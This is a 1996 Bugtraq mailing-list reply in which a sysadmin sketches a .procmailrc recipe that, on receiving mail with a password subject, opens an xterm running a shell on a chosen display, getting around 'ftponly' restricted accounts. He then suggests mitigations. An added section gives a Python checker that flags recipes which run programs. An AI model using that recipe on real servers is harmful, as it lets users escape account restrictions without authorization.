[3070] in bugtraq


Re: procmail

daemon@ATHENA.MIT.EDU (Neil Soveran-Charley)
Tue Aug 6 18:14:19 1996

Date: 	Tue, 6 Aug 1996 22:30:46 +0100
Reply-To: Bugtraq List <BUGTRAQ@netspace.org>
From: Neil Soveran-Charley <athan@MERSINET.CO.UK>
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@netspace.org>
In-Reply-To: <199608060524.KAA01113@protocol.ece.iisc.ernet.in> from "DANIEL .D .EZEKIEL" at Aug 6, 96 10:24:10 am

> hi there,
> I just heard from a friend that there is a bug in procmail
> which allows anyone to open an xterm window from any
> m/c. Has anyone heard of this? If so, can u post the details
> and the xploit.
> thanx
> danny
>

   NB: This isn't a 'hack an account' hole. However, if you have
'ftponly' accounts, i.e. people grab email via pop but also have ftp
access for maintaining their web pages, with a 'shell' that prints a
message and exits, then the following makes it possible to work around
such security...

   I think there may well be such an exploit. I'd guess it is simply
something like:

(.procmailrc contents)

:0 Hc
* ^Subject:.*APassword
/usr/bin/X11/xterm -display <some display> -e <a shell>

(end .procmailrc)

  Then email yourself with something with the password in the subject
line and an xterm gets popped up on the display, running the given
shell, thus bypassing any 'locked account' or 'ftponly' shells...

  I'm sure procmail MUST have some security feature to disallow this
sort of thing? But I could be wrong, and haven't checked the manual
pages yet.

  For now I'm going to make procmail only executable by a certain
group, and stick the 'admin' types in that.

  Of course, if you don't NEED X on the mail server, just delete it and
it removes THIS particular exploit. BUT I'd feel more comfortable with
making procmail only executable by 'internal' accounts. The customer,
in our case, isn't PAYING for a shell account, and so shouldn't get ANY
of the facilities of one... Never mind the security issues...

-Neil
--
**************************************************************
* Neil Soveran-Charley, SysAdmin, Mersinet Internet Services *
* Email: athan@mersinet.co.uk    * "What? No quote?"         *
**************************************************************
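A defender-side check for the kind of recipe discussed in this thread, added here as an example and not part of the original message or of procmail itself: it parses the recipes in a .procmailrc and reports those whose action line hands mail to a program rather than filing or forwarding it. The sample rc, its program path and trigger word are constructed; the parser is simplified (one action line per recipe, no descent into nested braces).

```python
"""Report .procmailrc recipes whose action executes a program.
Simplified parser: one action line per recipe; recipes inside { } blocks
still parse because each begins with ':0'."""
from dataclasses import dataclass, field

@dataclass
class Recipe:
    flags: str                                      # e.g. "Hc" from ":0 Hc"
    conditions: list = field(default_factory=list)  # the "* ..." lines
    action: str = ""                                # the delivery line

def action_kind(action):
    """Classify a procmail action line by its first character."""
    if action.startswith("|"):
        return "program"     # message is piped into a command
    if action.startswith("!"):
        return "forward"     # message is resent to the listed addresses
    if action.startswith("{"):
        return "block"       # nested recipes follow
    return "mailbox"         # anything else names a file or directory

def parse_recipes(text):
    recipes, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith(":0"):
            # ":0 Hc:" -> flags "Hc"; text after a second ':' names a lockfile
            current = Recipe(flags=line[2:].split(":", 1)[0].strip())
            recipes.append(current)
        elif current is not None and line.startswith("*"):
            current.conditions.append(line[1:].strip())
        elif current is not None and not current.action:
            current.action = line
            current = None   # assignments etc. before the next ':0' are ignored
    return recipes

def find_program_actions(text):
    """Return (flags, conditions, action, reason) for every recipe that runs a
    program, plus 'mailbox' actions carrying arguments: procmail would treat
    such a line as a (bogus) mailbox name, but it reveals an intended command."""
    hits = []
    for r in parse_recipes(text):
        kind = action_kind(r.action)
        if kind == "program":
            hits.append((r.flags, r.conditions, r.action, "pipes mail into a program"))
        elif kind == "mailbox" and len(r.action.split()) > 1:
            hits.append((r.flags, r.conditions, r.action, "mailbox name with arguments"))
    return hits

# Constructed sample rc: a filing recipe, a piping recipe, and a forward.
SAMPLE_RC = """\
MAILDIR=$HOME/Mail
:0:
* ^Subject:.*\\[list\\]
lists

:0 Hc
* ^Subject:.*trigger-word
| /usr/local/bin/some-program --option

:0
* ^From:.*boss@example\\.com
! backup@example.com
"""
```

Run over each user's rc on the mail server, any hit with a program action is a recipe that executes code for that user when a matching message arrives, which is exactly what a restricted 'ftponly' shell was meant to prevent.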
